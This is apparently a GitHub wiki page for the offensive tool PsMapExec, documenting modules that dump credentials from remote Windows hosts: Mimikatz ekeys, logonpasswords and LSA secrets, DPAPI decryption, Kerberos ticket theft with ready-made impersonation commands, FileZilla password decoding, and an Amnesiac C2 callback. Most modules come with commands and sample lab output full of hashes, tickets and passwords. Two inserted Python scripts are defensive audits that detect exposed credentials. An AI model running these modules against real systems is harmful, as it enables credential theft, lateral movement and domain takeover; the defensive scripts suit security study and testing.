
04 ‐ Modules

The-Viper-One edited this page Oct 14, 2025 · 19 revisions

Overview

In PsMapExec, Modules are used to execute premade scripts and blocks of code on remote systems. You have likely used similar premade code before with NetExec, where you might issue the following command to dump SAM hashes on a remote system:

nxc smb 10.10.10.100 -u user -p pass -d security.local --sam

Or, in a similar fashion, like this with PsMapExec:

pme smb -t 10.10.10.100 -u user -p pass -d security.local -m sam

Many of the modules in PsMapExec produce a fair bit of output. By default, module output is suppressed in the console; results are stored locally on disk and parsed within the console so that only the interesting information is shown. If you wish to see the full output for each system, append -ShowOutput to your commands.

> Amnesiac

Description

This module automatically starts Amnesiac C2 in a separate process on the attacking system. PsMapExec then executes the appropriate payload on the specified remote systems to establish a persistent connection back to the Amnesiac console window.

Once a session has been established on the required remote systems, it is highly recommended to consult the Amnesiac documentation to aid in post-exploitation.

Github: https://github.com/Leo4j/Amnesiac

Documentation: https://leo4j.gitbook.io/amnesiac/get-started/quick-start

Optional Parameters

Parameter Value Description
-Scramble N/A Scrambles the pipe name to an alternate value
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Amnesiac

> Console History

Description

Searches for and reads the ConsoleHost_history.txt file within each accessible user directory. This file often contains credentials that were typed into the terminal.

Output for each system is stored in $pwd\PME\PME\Console History\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module ConsoleHistory -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module ConsoleHistory -ShowOutput

WMI   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [*] NO RESULTS
WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS

-----[Administrator]-----
add-computer -DomainName security.local -DomainCredential security.local\administrator
ipconfig

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+]SUCCESS

-----[Administrator.SECURITY]-----
whoami ; hostname
get-service | Select-Object -First 15 |FL
sqlcmd -S sqlserver01.contoso.local\SQLEXPRESS -U sqluser -P P@ssw0rd123

-----[arbiter]-----
ssh [email protected]

> DPAPI

Description

This module elevates to SYSTEM on the target host, then extracts and decrypts the machine MasterKeys, which are in turn used to identify and decrypt machine vaults and credentials.

Output for each system is stored in $pwd\PME\PME\DPAPI\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

PsMapExec WMI -Targets [Targets] -Module DPAPI -ShowOutput

Example Output

PS > PsMapExec WMI -Targets all -Module DPAPI -ShowOutput

WMI   10.2.10.12      sccm-distro.ludus.domain    Windows Server 2022 Standard Evaluation   [+] SUCCESS

< -- Snip -- >

[*] SYSTEM master key cache:
{5b16122a-d97a-4fa3-876a-9559f83a96d8}:4BE04912F7A6679FF691BCBFEE572FFDE614A010
{83171779-27c2-4763-9200-5bfea3be01d0}:8233DAEEA7C51CF70B546D2DD163FF547A2B714A
{9c19c98d-c55d-491a-973f-0310a02edfa1}:91175FC0DDE056145177563A109A121F22A52913
{a201902b-ec3e-4c14-9f1a-ba17d3988e80}:F475E3789DA3467B7512A18E5FDD24DA6F12B3CC
{ea477cba-d82d-48e4-8ee2-d99a8740c7df}:FDEDB0C27A7048F36CB41737D581527E2E291979
{3ba46d27-0d59-4ee4-96be-a1ccefe6036b}:F7624E9F780D77C799D60BE0EC7C4051036FAECD

[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials


  CredFile           : B35F1E4B65404C44D90921DE298F2589
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data



    guidMasterKey    :
    size             : 266
    flags            : 0x00000030 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data
    LastWritten      : 6/19/2025 8:22:54 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{34F1D61B-D545-4A3E-ABB3-70D14BB72151}
    TargetAlias      :
    Comment          :
    UserName         : ludus\domainadmin
    Credential       : password

> EventCreds

Parses Sysmon Event ID 1 and Security event log ID 4688 for credentials passed on the command line.

Output for each system is stored in $pwd\PME\EventCreds\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module EventCreds -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module eventcreds -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard    [+] SUCCESS

TimeCreated       : 05/07/2025 16:46:07
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\net.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : net  user testu /add Password123

TimeCreated       : 05/07/2025 16:46:03
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\net.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : net  user test /add Password123

TimeCreated       : 04/07/2025 21:23:20
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\wbem\WMIC.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : wmic  /node:"TARGETHOST" /user:AdminUser /password:Adm1nP@ss process call create "cmd.exe /c whoami"

TimeCreated       : 04/07/2025 21:22:50
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\sc.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : sc.exe  create MyService binPath= "C:\MyApp\app.exe" obj= "DOMAIN\ServiceAcct" password=SvcP@s
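As an added, defender-side example (not PsMapExec code), the following Python scans the CommandLine field of 4688 / Sysmon Event ID 1 records for the credential-bearing patterns shown above (net user, wmic /password:, sc create password=, plus the sqlcmd -P form from the Console History output earlier on this page) and reports the affected account and process with the secret masked, so exposed credentials can be rotated and the scripts that leak them fixed. The event records are constructed samples using the field names of the output above.

```python
import re
from dataclasses import dataclass

# Constructed sample records using the field names EventCreds reports
# (Security 4688 / Sysmon Event ID 1). Secrets here are fake lab values.
SAMPLE_EVENTS = [
    {"TimeCreated": "05/07/2025 16:46:07", "AccountName": "SECURITY\\Moe",
     "ProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net  user testu /add Password123"},
    {"TimeCreated": "04/07/2025 21:23:20", "AccountName": "SECURITY\\Moe",
     "ProcessName": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic  /node:"TARGETHOST" /user:AdminUser /password:Adm1nP@ss '
                    'process call create "cmd.exe /c whoami"'},
    {"TimeCreated": "04/07/2025 21:22:50", "AccountName": "SECURITY\\Moe",
     "ProcessName": r"C:\Windows\System32\sc.exe",
     "CommandLine": 'sc.exe  create MyService binPath= "C:\\MyApp\\app.exe" '
                    'obj= "DOMAIN\\ServiceAcct" password=SvcP@s'},
    {"TimeCreated": "04/07/2025 21:20:11", "AccountName": "SECURITY\\svc_sql",
     "ProcessName": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE",
     "CommandLine": r"sqlcmd -S sqlserver01.contoso.local\SQLEXPRESS -U sqluser -P P@ssw0rd123"},
    {"TimeCreated": "04/07/2025 21:19:02", "AccountName": "SECURITY\\Moe",
     "ProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user testu *"},      # '*' prompts interactively: nothing is logged
    {"TimeCreated": "04/07/2025 21:18:40", "AccountName": "SECURITY\\Moe",
     "ProcessName": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all"},         # benign control record
]

@dataclass(frozen=True)
class Finding:
    time: str
    logged_by: str        # AccountName that launched the process
    process: str
    technique: str        # which pattern fired
    exposed_account: str  # account whose secret is now sitting in the log
    masked_secret: str    # never the secret itself

# Switch-style patterns; the named groups isolate the secret so it can be masked.
FLAG_PATTERNS = {
    # wmic ... /user:<account> /password:<secret>
    "wmic /password:": re.compile(r"/user:(?P<account>\S+)\s+/password:(?P<secret>\S+)", re.I),
    # sc create ... obj= "<account>" password= <secret>   (sc tolerates a space after '=')
    "sc password=": re.compile(
        r'obj=\s*"?(?P<account>[^"\s]+)"?\s+password=\s*"?(?P<secret>[^"\s]+)', re.I),
    # sqlcmd -U <account> -P <secret>   (case-sensitive: -P is the password switch)
    "sqlcmd -P": re.compile(r"-U\s+(?P<account>\S+)\s+-P\s+(?P<secret>\S+)"),
}

def find_net_user_secret(cmd):
    """'net user <account> [<password>] [/add ...]' in either argument order.

    Returns (account, password) or None. A '*' password means an interactive
    prompt, so the secret never reaches the command line.
    """
    toks = cmd.split()
    low = [t.lower() for t in toks]
    for i, tok in enumerate(low):
        if tok in ("net", "net.exe", "net1", "net1.exe") and low[i + 1:i + 2] == ["user"]:
            rest = toks[i + 2:]
            if not rest:
                return None                      # 'net user' alone only lists accounts
            for arg in rest[1:]:
                if arg.startswith("/"):
                    continue                     # /add, /domain, ... are options
                return None if arg == "*" else (rest[0], arg)
            return None
    return None

def detect(cmd):
    """Return (technique, exposed_account, secret) for one command line, or None."""
    hit = find_net_user_secret(cmd)
    if hit:
        return ("net user",) + hit
    for name, pat in FLAG_PATTERNS.items():
        m = pat.search(cmd)
        if m:
            return (name, m.group("account"), m.group("secret"))
    return None

def mask(secret):
    """Keep the first character only, so a finding can be matched to a rotation ticket."""
    return secret[:1] + "*" * (len(secret) - 1)

def audit(events):
    """Scan event records and return Findings with secrets masked."""
    findings = []
    for ev in events:
        hit = detect(ev.get("CommandLine", ""))
        if hit is None:
            continue
        technique, account, secret = hit
        findings.append(Finding(ev["TimeCreated"], ev["AccountName"], ev["ProcessName"],
                                technique, account, mask(secret)))
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_EVENTS):
        print(f"{f.time}  {f.logged_by:<18} {f.technique:<16} "
              f"account={f.exposed_account} secret={f.masked_secret}  ({f.process})")
```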

> eKeys

Executes Mimikatz's sekurlsa::ekeys on each target system to retrieve Kerberos encryption keys.

Output for each system is stored in $pwd\PME\eKeys\

Optional Parameters

Parameter Value Description
-NoParse N/A If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module eKeys -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module ekeys -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard    [+] SUCCESS

OtkMCEyH(powershell) # token::elevate
TOkEn ID  : 0
usER namE : 
SID NaME  : NT AUTHORITY\SYSTEM

584	{0;000003e7} 1 D 21623     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 --> Success!
 - PRocesS tOKEN : {0;02186d64} 0 D 35156221  	SECURITY\Moe	S-1-5-21-1201573619-2117991115-2379797238-1115	(11g,24p)	Primary
 - THreaD tOKEN  : {0;000003e7} 1 D 35205141  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

OtkMCEyH(powershell) # sekurlsa::ekeys

aUtHEnTICatION id : 0 ; 9945342 (00000000:0097c0fe)
SESSion           : Interactive from 1
User Name         : Administrator
dOmAin            : SECURITY
lOgOn seRVer      : DC01
loGOn TIMe        : 18/05/2025 16:17:04
siD               : S-1-5-21-1201573619-2117991115-2379797238-500

	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY.LOCAL
	 - PASswOrd : (null)
	 - keY list :
	   aes256_hmaC       8bf4e9d571a39107152b782b0ea873cf7e874e09883592e9e91614f91bb0ce08
	   rc4_hMAc_NT       602f5c34346bc946f9ac2c0922cd9ef6
	   RC4_HmAC_OlD      602f5c34346bc946f9ac2c0922cd9ef6

<-- Snip -->

Parsing

PsMapExec parses the results from each system and presents them in a digestible, readable format. The notes field highlights in yellow any interesting information about each result.

The table below shows the possible values for the notes field.

Value Description
AdminCount=1 The parsed account has an AdminCount value of 1, meaning the account may hold some form of privileged access within the domain.
rc4_hmac_nt=Empty Password The rc4 value is equal to that of an empty password.
Cleartext Password A cleartext password was parsed from the results. This is only highlighted for user accounts and omitted for computer accounts.
Domain Admin / Enterprise Admin / Server Operator / Account Operator The account is a member of one of these high value groups.

Example Output (Parsing)

PS> PsMapExec wmi -Targets all -Module ekeys

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

Parsing Results

-[MSSQL02.security.local]-

Username    : security.local\Administrator
aes256_hmac : 8bf4e9d571a39107152b782b0ea873cf7e874e09883592e9e91614f91bb0ce08
rc4_hmac_nt : 602f5c34346bc946f9ac2c0922cd9ef6
Notes       : [AdminCount=1] [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] 

Username    : security.local\arbiter
aes256_hmac : 843392598e6333d0cc5bf77cf7a5f15d64e669823ab6d747ed32d013f0915342
rc4_hmac_nt : 58a478135a93ac3bf058a5ea0e8fdb71

Username    : security.local\mssql02$
aes256_hmac : 8ff6e135e27212cc3fa79927f28ec26ad81a098c42c55f83a84efb1ffa54ddde
rc4_hmac_nt : b58cff1e40f33c061af24cd485a07f33


-[Security-CA.security.local]-

Username    : security.local\security-ca$
aes256_hmac : 2e37844392f8fa1991f79e4d6f0220c017513787fe87865e352691e2d3b466bf
rc4_hmac_nt : 6e0028f4965e20e922fde677e40f9831

> Files

Description

The Files module enumerates non-default files within the home and primary directories of each accessible user on the remote system.

This can help identify interesting files on each system which may contain sensitive or credentialed information.

Output for each system is stored in $pwd\PME\PME\User Files\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Files -ShowOutput

Example Output

PS C:\Users\moe> PsMapExec wmi -Targets all -username moe -Password Password123! -module files -ShowOutput

WMI   10.10.10.17     MSSQL01.security.local   Windows Server 2022 Standard   [+] SUCCESS
----------------------------------------------------------------------------------------------
[User] Administrator

[Downloads]
- firefox.msi (223080.02 KB)

[Documents]
- Sever_Backup_Passwords.xlsx (16.32 KB)

[Desktop]
- Add_Admin.ps1 (1.20 KB)
- keepass_pw.7z (1.27 KB)
- Passwords.txt (5.16 KB)
----------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------
[User] vagrant

[Home]
- .vbox_version (0.01 KB)
----------------------------------------------------------------------------------------------

> FileZilla

Description

This module iterates through each user's %APPDATA% folder on the target host and identifies files associated with FileZilla that often store credentials, such as:

  • %AppData%\FileZilla\sitemanager.xml
  • %AppData%\FileZilla\recentservers.xml

Any discovered credentials are decoded to their plaintext value if they are not encrypted with a master password.

Output for each system is stored in $pwd\PME\PME\FileZilla\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module FileZilla -ShowOutput

Example Output

PS > PsMapExec winrm -Targets all -Module filezilla -ShowOutput

WinRM   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

Path: C:\Users\Administrator.SECURITY\AppData\Roaming\FileZilla\sitemanager.xml

=================================
Host     : security.local
Port     : 21
User     : ftp
Password : Password123!
=================================

=================================
Host     : 10.10.100.29
Port     : 221
User     : grunt
Password : HighCharity!!
=================================

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS
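As an added, defender-side example (not PsMapExec code), this Python audit reads a FileZilla sitemanager.xml and classifies how each saved site's password is stored, flagging entries that are merely base64-encoded (recoverable, as the module output above shows) versus those protected by a master password. The XML is a constructed sample in the FileZilla 3 layout; the encoding values base64 and crypt are the client's own, and the same <Server> element layout is assumed for recentservers.xml.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml in the FileZilla 3 layout: one site with a base64-encoded
# password, one protected by a master password (encoding="crypt"; ciphertext and salt
# are made-up values), and one site that asks for the password at connect time.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <Servers>
    <Server>
      <Host>security.local</Host><Port>21</Port><Protocol>0</Protocol>
      <Logontype>1</Logontype>
      <User>ftp</User>
      <Pass encoding="base64">UGFzc3dvcmQxMjMh</Pass>
      <Name>Finance FTP</Name>
    </Server>
    <Server>
      <Host>10.10.100.29</Host><Port>221</Port><Protocol>1</Protocol>
      <Logontype>1</Logontype>
      <User>grunt</User>
      <Pass encoding="crypt" salt="c29tZXNhbHQ=">ZmFrZS1jaXBoZXJ0ZXh0</Pass>
      <Name>Backup SFTP</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host><Port>22</Port><Protocol>1</Protocol>
      <Logontype>2</Logontype>
      <User>auditor</User>
      <Name>Prompt for password</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

def classify_pass(pass_el):
    """Map a <Pass> element to how the secret is protected on disk."""
    if pass_el is None or not (pass_el.text or "").strip():
        return "none"                 # nothing stored (interactive / anonymous logon)
    encoding = pass_el.get("encoding", "")
    if encoding == "base64":
        try:                          # base64 is encoding, not encryption
            base64.b64decode(pass_el.text.strip(), validate=True)
            return "plaintext"        # anyone who can read the file has the password
        except (binascii.Error, ValueError):
            return "unknown"          # malformed value: treat as exposed until checked
    if encoding == "crypt":
        return "master-password"      # only recoverable with the user's master password
    return "unknown"

def audit_sitemanager(xml_data):
    """Return one dict per saved site describing its password storage (no secrets)."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    findings = []
    for srv in root.iter("Server"):
        findings.append({
            "name": (srv.findtext("Name") or "").strip(),
            "host": (srv.findtext("Host") or "").strip(),
            "port": (srv.findtext("Port") or "").strip(),
            "user": (srv.findtext("User") or "").strip(),
            "storage": classify_pass(srv.find("Pass")),
        })
    return findings

def exposed_sites(findings):
    """Entries whose stored password is recoverable without a master password."""
    return [f for f in findings if f["storage"] in ("plaintext", "unknown")]

if __name__ == "__main__":
    results = audit_sitemanager(SAMPLE_SITEMANAGER)
    for f in results:
        print(f'{f["storage"]:<16} {f["user"]}@{f["host"]}:{f["port"]}  ({f["name"]})')
    print(f"{len(exposed_sites(results))} site(s) store a recoverable password")
```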

> KerbDump

Dumps Kerberos tickets on the remote system. The code is based on PowerShell Kerberos by Michael Zhmaylo (MzHmO): https://github.com/MzHmO/PowershellKerberos

Output for each system is stored in $pwd\PME\Tickets\KerbDump\

Optional Parameters

Parameter Value Description
-NoParse N/A If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results
-Option kerbdump:monitor:5 Runs on a loop on the remote host for 5 minutes collecting tickets

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module KerbDump -ShowOutput

# Monitor collection for 15 minutes on remote host
PsMapExec [Method] -Targets [Targets] -Module KerbDump -ShowOutput -Option "kerbdump:monitor:15"

Example Output

PS > PsMapExec smb -Targets all -Module kerbdump -ShowOutput

SMB   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SUCCESS

Service Name     : krbtgt/SECURITY.LOCAL
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 21/05/2025 04:00:42
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIFnjCCBZqgAwIBBaEDAgEWooIEnTCCBJlhggSVMIIEkaADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5
MT0NBTKOCBFEwggRNoAMCARKhAwIBAqKCBD8EggQ7NwR5BrieKrzx4jlVKlIW7mLyg16e0iMlTTfDLgeSthdc7wqOpufiEdS/0se5rJ2hVQynkk+UWArVBOO
<-- Snip -->

Service Name     : krbtgt/DEV.SECURITY.LOCAL
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 19/05/2025 02:03:24
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIFoTCCBZ2gAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoicwJaADAgECoR4wHBsGa3JidGd0GxJERVYuU0VDVVJ
JVFkuTE9DQUyjggRMMIIESKADAgESooIEPwSCBDvkJOOS6fspu8E6vL+ldWHJLHyp1TaqBatWOzVB1GMIo+kbU3xvQZmSYOOStjakNSwn2KYh0z9YEzMWZZF
<-- Snip -->

Service Name     : cifs/DC02.security.local
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 21/05/2025 04:00:42
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIGBjCCBgKgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiYwJKADAgECoR0wGxsEY2lmcxsTREMwMi5zZWN1cml
0eS5sb2NhbKOCBLMwggSvoAMCARKhAwIBAaKCBKEEggSdJ1UjM7kOwLFOptlABDiodhOqNSe5WbU+UYzfExGAnLoT19zGHPbP355okiC+ioWmMxKlasgkCh+
<-- Snip -->

Parsing

PsMapExec parses the results from each system and presents them in a digestible, readable format. The notes field highlights in yellow any interesting information about each result.

Tickets identified as a TGT also include, in the Impersonate field, a ready-made PsMapExec command that can be run directly afterwards to impersonate that account.

The table below shows the possible values for the notes field.

Value Description
TGT Represents a TGT ticket
AdminCount=1 Identifies an account that may hold privileged permissions within the domain
Domain Admin / Enterprise Admin / Server Operator / Account Operator The account is a member of one of these privileged groups

Example Output (Parsing)

Parsing Results

-[DC01.security.local-Tickets]-

User Name     : security\Moe
Service Name  : krbtgt/security.local
Ticket Expiry : 20/05/2025 21:35:11
Notes         : [Domain Admin] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $xUAVFqZciwjQznsN

User Name     : security\Administrator
Service Name  : krbtgt/security.local
Ticket Expiry : 18/05/2025 21:23:44
Notes         : [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $kpHbuTtVClYqLXdF

-[MSSQL02.security.local-Tickets]-

User Name     : security\Administrator
Service Name  : krbtgt/security.local
Ticket Expiry : 21/05/2025 05:43:03
Notes         : [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $eBsmwhNinRVqatpO

User Name     : security\arbiter
Service Name  : krbtgt/security.local
Ticket Expiry : 19/05/2025 02:21:26
Notes         : [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $JHhdIEATgZrNeBqF

[*] Only interesting results have  been shown. Computer accounts are omitted
[*] Run with -NoParse to prevent parsing results in the future
[*] Each ticket has been stored in C:\Users\moe\PME\Tickets

> LogonPasswords

Executes Mimikatz's sekurlsa::logonpasswords on the target system.

Output for each system is stored in $pwd\PME\LogonPasswords\

Optional Parameters

Parameter Value Description
-NoParse N/A If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-Rainbow N/A When provided, collected hashes are compared against the online database ntlm.pw
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module LogonPasswords -ShowOutput

Example Output

PS > PsMapExec winrm -Targets servers -Module logonpasswords -ShowOutput

WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [+] SUCCESS

<-- Snip -->

OtkMCEyH(powershell) # sekurlsa::logonpasswords

aUtHEnTICatION id : 0 ; 9945342 (00000000:0097c0fe)
SESSion           : Interactive from 1
User Name         : Administrator
dOmAin            : SECURITY
lOgOn seRVer      : DC01
loGOn TIMe        : 18/05/2025 16:17:04
siD               : S-1-5-21-1201573619-2117991115-2379797238-500
	MSv :	
	 [00000003] Primary
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY
	 - Ntlm     : 602f5c34346bc946f9ac2c0922cd9ef6
	 - sHA1     : 1b4c7a2c1b58e59d184291da8436b4c9f3b26c50
	 - Dpapi    : 67001f544cbcb8c06d0ad55a9f44ec79
	tspKg :	
	wdIgESt :	
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY
	 - PASswOrd : (null)
	KERBerOS :	
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY.LOCAL
	 - PASswOrd : (null)
	sSp :	
	CredmAn :	

<-- Snip -->

Parsing

PsMapExec parses the results from each system and presents them in a digestible, readable format. The notes field highlights in yellow any interesting information about each result.

The table below shows the possible values for the notes field.

Value Description
AdminCount=1 The parsed account has an AdminCount value of 1, meaning the account may hold some form of privileged access within the domain.
NTLM=Empty Password The NTLM value is equal to that of an empty password.
Cleartext Password A cleartext password was parsed from the results. This is only highlighted for user accounts and omitted for computer accounts.
Domain Admin / Enterprise Admin / Server Operator / Account Operator The account is a member of one of these high value groups.

At the end of parsing, all unique NTLM hashes are shown in the console window. A Hashcat-ready file of the collected NTLM hashes is also written to $pwd\PME\LogonPasswords\.AllUniqueNTLM.txt

Example Output (Parsing)

Parsing Results


-[DC01.security.local]-

Username  : security\dc01$
NTLM      : 04b219f63c94d1405ce3d11b64dcafe3

Username  : security\administrator
NTLM      : 602f5c34346bc946f9ac2c0922cd9ef6
Notes     : [AdminCount=1] [Domain Admin]  [Enterprise Admin]  [Schema Admin]  [Group Policy Creator Owner] 

-[MSSQL02.security.local]-

Username  : security\arbiter
NTLM      : 58a478135a93ac3bf058a5ea0e8fdb71

Username  : security\administrator
NTLM      : 602f5c34346bc946f9ac2c0922cd9ef6
Notes     : [AdminCount=1] [Domain Admin]  [Enterprise Admin]  [Schema Admin]  [Group Policy Creator Owner] 

Username  : security\mssql02$
NTLM      : b58cff1e40f33c061af24cd485a07f33
Password  : __:J^>H-xSm#Vz1*Bo )h.UAW6/g"imk+w?]e `)(d6v,s\A`,<>serEzD$b./<w&9P,2ZP3ayU'U(T&k@2Oq8/SXQbtOUA?gBOO\!+)uqvWTMz5Up7wJq\o

-[SRV2012.security.local]-

Username  : security\srv2012$
NTLM      : d167e284b82d44414b3eb49cab3c98db
Password  : -0P,Nv[ =1)%0&y,q!nfe-5>8,;k1an%w'*<k8\3oahnOo:Ix=h_lQH5W]&Lx*1UBx7)DC.peI77)MYqY*>1q&sj%6SAq?v-%rJwZ^sJwYeQ#6`jffD)$9Y2


-------------------------------------- All collected NTLM User Hashes (Unique) --------------------------------------

SECURITY\Administrator:602f5c34346bc946f9ac2c0922cd9ef6
SECURITY\arbiter:58a478135a93ac3bf058a5ea0e8fdb71

---------------------------------------------------------------------------------------------------------------------

> LSA

Executes Mimikatz's lsadump::secrets on the target system.

Output for each system is stored in $pwd\PME\LSA\

Optional Parameters

Parameter Value Description
-ShowOutput N/A Displays each target's output to the console
-SuccessOnly N/A Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module LSA -ShowOutput

Example Output

PS > PsMapExec wmi -Targets all -Module lsa -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
OtkMCEyH(powershell) # token::elevate
TOkEn ID  : 0
usER namE : 
SID NaME  : NT AUTHORITY\SYSTEM

<-- Snip -->

Local name : SECURITY-CA ( S-1-5-21-3711964894-3574166338-3279816048 )
Domain name : SECURITY ( S-1-5-21-1201573619-2117991115-2379797238 )
doMAin fQDN : security.local

SubSystEm PoLicY : 1.18
Key (LSA) : 1, default {5ccec7da-ce6c-f1a1-1603-bd620f5adf8e}
  [00] {5ccec7da-ce6c-f1a1-1603-bd620f5adf8e} 089155f9725437690724e850c8a7a766b9e4b47f08b1d683d7d7875149fc3ed6

seCReT  : $MACHINE.ACC
cur/text: Ys4QWFKbb`D3U%,8xzZzB4B<Ld*EUMR2\vr-=PjrqVMq<L4)t+,9S3`+3(7kN`F:>RKK]MNj(L?*zpuw=Ik;VTOF>rT5pWm*q6@hb=T!i2rm(iY^Axteh`2C
    NtLm:6e0028f4965e20e922fde677e40f9831
    SHA1:c54987aa5b2a5b61b2cb8395ee1b17d391028fe0
old/text: Ys4QWFKbb`D3U%,8xzZzB4B<Ld*EUMR2\vr-=PjrqVMq<L4)t+,9S3`+3(7kN`F:>RKK]MNj(L?*zpuw=Ik;VTOF>rT5pWm*q6@hb=T!i2rm(iY^Axteh`2C
    NtLm:6e0028f4965e20e922fde677e40f9831
    SHA1:c54987aa5b2a5b61b2cb8395ee1b17d391028fe0

seCReT  : DPAPI_SYSTEM
cur/Hex : 01 00 00 00 52 a2 71 88 6b f2 a2 67 64 64 3c 02 aa 93 9a 9f d8 2d e2 a0 76 3f d1 33 9e 98 7d f7 2c a8 b0 09 d0 d1 77 e6 09 5f 75 d2
